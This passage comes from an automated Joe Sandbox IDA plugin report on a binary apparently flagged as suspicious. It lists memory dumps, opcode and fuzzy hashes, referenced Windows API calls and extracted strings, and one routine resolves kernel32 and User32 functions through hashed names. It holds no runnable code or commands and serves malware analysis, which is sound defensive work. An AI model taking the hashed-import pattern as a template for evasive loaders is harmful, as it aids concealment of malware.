                                                                                          • Instruction Fuzzy Hash: EE110632A056924BE7018E2DC8406D6BBA7EFCE710B1A81EAE854DF217C774991BC7D0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 18bedcc6e9b90413334a9e00bffa9294d3a71957c983960659b6212fd25c34a5
                                                                                          • Instruction ID: 559514e96aed1c5316944d2ebcbcd40a193fd95b87581bcda7c8161503522f15
                                                                                          • Opcode Fuzzy Hash: 18bedcc6e9b90413334a9e00bffa9294d3a71957c983960659b6212fd25c34a5
                                                                                          • Instruction Fuzzy Hash: 0121AAB5D052188FCB10CFA9D584ADEFBF4EB49320F24906AE818B7320D735A945CF64
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1a953b35a80c17118bd13644806be8d0a0585007b7190a097129057f0dbfbb29
                                                                                          • Instruction ID: e620dfe644fe52ce1683e0b67de751900f8c29a221c4f338d0604c9ea197d580
                                                                                          • Opcode Fuzzy Hash: 1a953b35a80c17118bd13644806be8d0a0585007b7190a097129057f0dbfbb29
                                                                                          • Instruction Fuzzy Hash: 05115EB6908649EFD704CF59D8417AAFBF4FB45720F10822EE81993B80E735A900CB90
                                                                                          APIs
                                                                                          • operator+.LIBCMT ref: 6D076FCC
                                                                                            • Part of subcall function 6D074147: DName::DName.LIBCMT ref: 6D07415A
                                                                                            • Part of subcall function 6D074147: DName::operator+.LIBCMT ref: 6D074161
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: NameName::Name::operator+operator+
                                                                                          • String ID:
                                                                                          • API String ID: 2937105810-0
                                                                                          • Opcode ID: 4c7fde43222f8823839001c450381a8b731bfe3a2e4fd1a1143668b34b3e022b
                                                                                          • Instruction ID: c6228defe87ac3cb6e42e600c6c40e0e5a39f02c8eaac97864529a00ce5a9b96
                                                                                          • Opcode Fuzzy Hash: 4c7fde43222f8823839001c450381a8b731bfe3a2e4fd1a1143668b34b3e022b
                                                                                          • Instruction Fuzzy Hash: 79D14E75D04209AFEF21DFA8C891BEEBBF4EF49344F11405AE611AB290DB319A45CB64
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06ECA5
                                                                                          • __mtterm.LIBCMT ref: 6D06ECB1
                                                                                            • Part of subcall function 6D06E97C: DecodePointer.KERNEL32(00000012,6D06A397,6D06A37D,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06E98D
                                                                                            • Part of subcall function 6D06E97C: TlsFree.KERNEL32(0000000A,6D06A397,6D06A37D,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06E9A7
                                                                                            • Part of subcall function 6D06E97C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6D06A397,6D06A37D,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D072325
                                                                                            • Part of subcall function 6D06E97C: DeleteCriticalSection.KERNEL32(0000000A,?,?,6D06A397,6D06A37D,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D07234F
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6D06ECC7
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6D06ECD4
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6D06ECE1
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6D06ECEE
                                                                                          • TlsAlloc.KERNEL32(?,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06ED3E
                                                                                          • TlsSetValue.KERNEL32(00000000,?,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06ED59
                                                                                          • __init_pointers.LIBCMT ref: 6D06ED63
                                                                                          • EncodePointer.KERNEL32(?,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06ED74
                                                                                          • EncodePointer.KERNEL32(?,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06ED81
                                                                                          • EncodePointer.KERNEL32(?,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06ED8E
                                                                                          • EncodePointer.KERNEL32(?,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06ED9B
                                                                                          • DecodePointer.KERNEL32(Function_0006EB00,?,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06EDBC
                                                                                          • __calloc_crt.LIBCMT ref: 6D06EDD1
                                                                                          • DecodePointer.KERNEL32(00000000,?,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06EDEB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6D06EDFD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                          • API String ID: 1868149495-3819984048
                                                                                          • Opcode ID: 08ce60f81d618ecb765895ad48c18f37affe4c09593b7c3bfa486cd470c32156
                                                                                          • Instruction ID: e1526ac859c60e3f4a3d9b1af9f74d206baff8211fa0835315627609b217cc29
                                                                                          • Opcode Fuzzy Hash: 08ce60f81d618ecb765895ad48c18f37affe4c09593b7c3bfa486cd470c32156
                                                                                          • Instruction Fuzzy Hash: 4B315336804B99AEEF10EF759C1872E3FF5BB4B61571A4526E424D3192EB708041CFA9
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove$Xinvalid_argumentstd::_
                                                                                          • String ID: invalid string position$string too long
                                                                                          • API String ID: 1771113911-4289949731
                                                                                          • Opcode ID: 9927400a390486af5aecb216081916a523120380e7ca660a3959044f51998634
                                                                                          • Instruction ID: a521e6f58ed8857221416d7472a4ad788d4096bad87913ae3d8548ee7a3f4089
                                                                                          • Opcode Fuzzy Hash: 9927400a390486af5aecb216081916a523120380e7ca660a3959044f51998634
                                                                                          • Instruction Fuzzy Hash: F3B1A0707181459BFB19CE9DDC91B9EB3AAEB89304754891CF492CB741C770EC91C7A2
                                                                                          APIs
                                                                                          • UnDecorator::getBasicDataType.LIBCMT ref: 6D077FFF
                                                                                          • DName::operator=.LIBCMT ref: 6D078013
                                                                                          • DName::operator+=.LIBCMT ref: 6D078021
                                                                                          • UnDecorator::getPtrRefType.LIBCMT ref: 6D07804D
                                                                                          • UnDecorator::getDataIndirectType.LIBCMT ref: 6D0780CA
                                                                                          • UnDecorator::getBasicDataType.LIBCMT ref: 6D0780D3
                                                                                          • operator+.LIBCMT ref: 6D078166
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
                                                                                          • String ID: std::nullptr_t$volatile
                                                                                          • API String ID: 2203807771-3726895890
                                                                                          • Opcode ID: eea33fdb7a36e2abb09367e756b40752152fa39321d1be6a9ebf22004d096c5e
                                                                                          • Instruction ID: dc662d425ab340a51d3506515491c0b21c84da8caeb462113f91e6396651b57c
                                                                                          • Opcode Fuzzy Hash: eea33fdb7a36e2abb09367e756b40752152fa39321d1be6a9ebf22004d096c5e
                                                                                          • Instruction Fuzzy Hash: 17417A71918509BFFB31CF54C880BAE7BB8FF06341F458169EA549F152D7319A828B9C
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D025177
                                                                                            • Part of subcall function 6D032820: _malloc.LIBCMT ref: 6D032871
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000004), ref: 6D0251B9
                                                                                          • SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6D0251D5
                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 6D0251E5
                                                                                          • _memmove.LIBCMT ref: 6D0251FF
                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6D025208
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D02522C
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6D025263
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02526C
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6D0252AD
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D0252B6
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000002,00000002), ref: 6D0252D2
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D02534E
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D025358
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$ElementVariant$Clear$CreateDataVector$AccessDestroyInitUnaccess_malloc_memmove
                                                                                          • String ID:
                                                                                          • API String ID: 452649785-0
                                                                                          • Opcode ID: d80ef5a91bf00a390d8638672f5ab71e98ddf1268e76d6f8a4ac0b5be5bea43f
                                                                                          • Instruction ID: 5bcb675747c298a3097184c31fffbc73efa4c8a195a197f40ce3996dff224bd8
                                                                                          • Opcode Fuzzy Hash: d80ef5a91bf00a390d8638672f5ab71e98ddf1268e76d6f8a4ac0b5be5bea43f
                                                                                          • Instruction Fuzzy Hash: BE712B75A0121AEFEB00CFA5C884BAFBBB9FF59304F008159E905D7240E774EA05CBA4
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D01FA0F
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D01FA22
                                                                                          • SafeArrayGetElement.OLEAUT32 ref: 6D01FA5A
                                                                                            • Part of subcall function 6D023A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D023B71
                                                                                            • Part of subcall function 6D023A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D023B83
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D026A08
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D026A15
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D026A41
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                            • Part of subcall function 6D01DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D01DFF6
                                                                                            • Part of subcall function 6D01DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D01E003
                                                                                            • Part of subcall function 6D01DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D01E02F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Bound$Destroy$Element
                                                                                          • String ID: RS7m$RS{m
                                                                                          • API String ID: 959723449-144615663
                                                                                          • Opcode ID: 8dae9c4ee980f497cd8a99c96576af7759d625befbd62088d40d513acb239f08
                                                                                          • Instruction ID: 49c320015e118afe2972b60d58b9919ac9ed7c6049a2ae7adeebcfd59ae4b10e
                                                                                          • Opcode Fuzzy Hash: 8dae9c4ee980f497cd8a99c96576af7759d625befbd62088d40d513acb239f08
                                                                                          • Instruction Fuzzy Hash: 84C18370A052059FEB10DFA8CC80FADB7B9AF85304F104199EA49EF286DB71ED41CB50
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Init$Clear$Copy
                                                                                          • String ID:
                                                                                          • API String ID: 3833040332-0
                                                                                          • Opcode ID: bf703b325c10b64de6a3f9c7a8bdb83519dd1c05de7a070f47a778a53f0df7b9
                                                                                          • Instruction ID: 3ecfe5cf2de1ca82ac0c54474c867a666062b2df61a055978929866f566b5a71
                                                                                          • Opcode Fuzzy Hash: bf703b325c10b64de6a3f9c7a8bdb83519dd1c05de7a070f47a778a53f0df7b9
                                                                                          • Instruction Fuzzy Hash: 62816AB1905219AFEF04DFA8C884FEEBBB9FF49304F15415DE905AB241DB34A905CBA0
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02D8EC
                                                                                          • VariantInit.OLEAUT32 ref: 6D02D902
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02D90D
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D02D929
                                                                                          • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6D02D966
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02D973
                                                                                          • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6D02D9B4
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02D9C1
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02DA6F
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02DA80
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02DA87
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02DA99
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
                                                                                          • String ID:
                                                                                          • API String ID: 1625659656-0
                                                                                          • Opcode ID: 0064272d1773bb3ea9e368995692c84c8b6b183c7943eceaf36fbc63040dd3ab
                                                                                          • Instruction ID: 6bbc7c2fa5c1f213a69c0392bedffd595448d62cb113c0f849d120b7b124a583
                                                                                          • Opcode Fuzzy Hash: 0064272d1773bb3ea9e368995692c84c8b6b183c7943eceaf36fbc63040dd3ab
                                                                                          • Instruction Fuzzy Hash: AA8135722093029FDB00CF68C884B5AB7F9FFC9715F048A5DE9959B240E774E905CBA2
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                          • String ID: invalid string position$string too long
                                                                                          • API String ID: 2168136238-4289949731
                                                                                          • Opcode ID: e8b485be68b69c486f74dba17df8475e1a56833acbf12c56ff6280dff055c521
                                                                                          • Instruction ID: 3ac0ac8eb53a4a8117cb4af4fe9bf84c3ebd91027be7db096e9303e1426b3440
                                                                                          • Opcode Fuzzy Hash: e8b485be68b69c486f74dba17df8475e1a56833acbf12c56ff6280dff055c521
                                                                                          • Instruction Fuzzy Hash: 164108313086445BF718CEECEC80B5EB3AAEB95314760492EF591CBA45D770D845C7A3
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02CD5C
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02CD65
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02CD6B
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D02CD76
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D02CDAA
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02CDB7
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D02D2A5
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02D2B5
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02D2BB
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02D2C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                                          • String ID:
                                                                                          • API String ID: 2515392200-0
                                                                                          • Opcode ID: a9c33c6d674cbcfd30f6751d2c05683de4216fd21650cd75ba4d6c19320705c4
                                                                                          • Instruction ID: 64e997b2183f42eb1b629d774d1b1f80e681e5f3ef628faf6e89f505b7ce8ca6
                                                                                          • Opcode Fuzzy Hash: a9c33c6d674cbcfd30f6751d2c05683de4216fd21650cd75ba4d6c19320705c4
                                                                                          • Instruction Fuzzy Hash: 0512F775A15706AFDB18DB94DD84DAAB3B9BF8D300F14466CF50A9BB91CA30F841CB90
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D024BDC
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D024BE5
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D024BEB
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D024BF6
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D024C2A
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024C37
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D025107
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D025117
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02511D
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D025123
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                                          • String ID:
                                                                                          • API String ID: 2515392200-0
                                                                                          • Opcode ID: b71fda4c422473647cdde964e4130ade02ebbc388914f52c6865368b4970e0d7
                                                                                          • Instruction ID: ea525bd4a71a885bcbaaa474e28947c171606a9a354ce46dae7c4ed870160e02
                                                                                          • Opcode Fuzzy Hash: b71fda4c422473647cdde964e4130ade02ebbc388914f52c6865368b4970e0d7
                                                                                          • Instruction Fuzzy Hash: 24120575605705AFDB18DB98DD84DBAB3B9BF8D300F144668F50AABB91CA30F841CB50
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D01DD00
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000003), ref: 6D01DD10
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,6D022FFF,?), ref: 6D01DD47
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01DD4F
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,6D022FFF,?), ref: 6D01DD6D
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6D01DDA4
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01DDAC
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D01DE16
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D01DE27
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01DE31
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Variant$ClearElement$Destroy$CreateInitVector
                                                                                          • String ID:
                                                                                          • API String ID: 3525949229-0
                                                                                          • Opcode ID: 3401607c90895ae4b63b4bb25d2439a3e65a4891a0c92c6926707d75d1cae93d
                                                                                          • Instruction ID: 278af17abd05ba16144a829538b57906f985c1bc85c2571297dee88194ee07af
                                                                                          • Opcode Fuzzy Hash: 3401607c90895ae4b63b4bb25d2439a3e65a4891a0c92c6926707d75d1cae93d
                                                                                          • Instruction Fuzzy Hash: A1512C75A04609AFDB00DFA5C884FAFBBB9FF9A701F118119EA15A7350DB35D901CBA0
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D03C213
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                          • String ID: gfff$gfff$gfff$gfff$gfff$gfff$vector<T> too long
                                                                                          • API String ID: 1823113695-1254974138
                                                                                          • Opcode ID: dc4da0759ca437e8955150272eca4196757b09ed7154cb4650148eaa3b644cf6
                                                                                          • Instruction ID: 90b72e0ec00ca79ae9a6a12364e4552cd436a6c714be00c38a4815218a3f919a
                                                                                          • Opcode Fuzzy Hash: dc4da0759ca437e8955150272eca4196757b09ed7154cb4650148eaa3b644cf6
                                                                                          • Instruction Fuzzy Hash: F9918775A04609AFDB18CF59DC90FAEB7B9EB88304F05861DE959DB740D730BA04CB91
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                          • String ID: invalid string position$string too long
                                                                                          • API String ID: 2168136238-4289949731
                                                                                          • Opcode ID: bd0843d86aa01488bbe1dc38e607b41cbe752acfeea0eb7d3cde1a92a242e856
                                                                                          • Instruction ID: de36a59c5b074ec24aeeec1e2e933db4b919752fe7210431a4df79b04d963550
                                                                                          • Opcode Fuzzy Hash: bd0843d86aa01488bbe1dc38e607b41cbe752acfeea0eb7d3cde1a92a242e856
                                                                                          • Instruction Fuzzy Hash: 1051A33171C1059BE724CE9EEC80B5EB7EAEBC9354B20851EF895C7285DB70EC6087A1
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6D031C5E
                                                                                          • LoadLibraryW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6D031C69
                                                                                          • GetProcAddress.KERNEL32(00000000,F1F2E532), ref: 6D031CA2
                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6D031CC1
                                                                                          • LoadLibraryW.KERNEL32(kernel32.dll,?,00000000), ref: 6D031CCC
                                                                                          • GetProcAddress.KERNEL32(00000000,EFF3E52B), ref: 6D031D0A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                          • String ID: User32.dll$kernel32.dll
                                                                                          • API String ID: 310444273-1965990335
                                                                                          • Opcode ID: aff2ddd6eaba22df1d67e8a58a85204b65dde009c37ac84cb150d105e8948b57
                                                                                          • Instruction ID: 4d083cd0e34172bb0b04a6b3b08c9201fa2a4044ed3d00be3be4b3e3a6a73cf4
                                                                                          • Opcode Fuzzy Hash: aff2ddd6eaba22df1d67e8a58a85204b65dde009c37ac84cb150d105e8948b57
                                                                                          • Instruction Fuzzy Hash: 56615274504A129FE720CF18C5C5B6BBBF6FF4A300F618958D5968BB42D736E846CB82
                                                                                          APIs
                                                                                          • UnDecorator::getArgumentList.LIBCMT ref: 6D07442E
                                                                                            • Part of subcall function 6D073FC9: Replicator::operator[].LIBCMT ref: 6D07404C
                                                                                            • Part of subcall function 6D073FC9: DName::operator+=.LIBCMT ref: 6D074054
                                                                                          • DName::operator+.LIBCMT ref: 6D074487
                                                                                          • DName::DName.LIBCMT ref: 6D0744DF
                                                                                          Strings
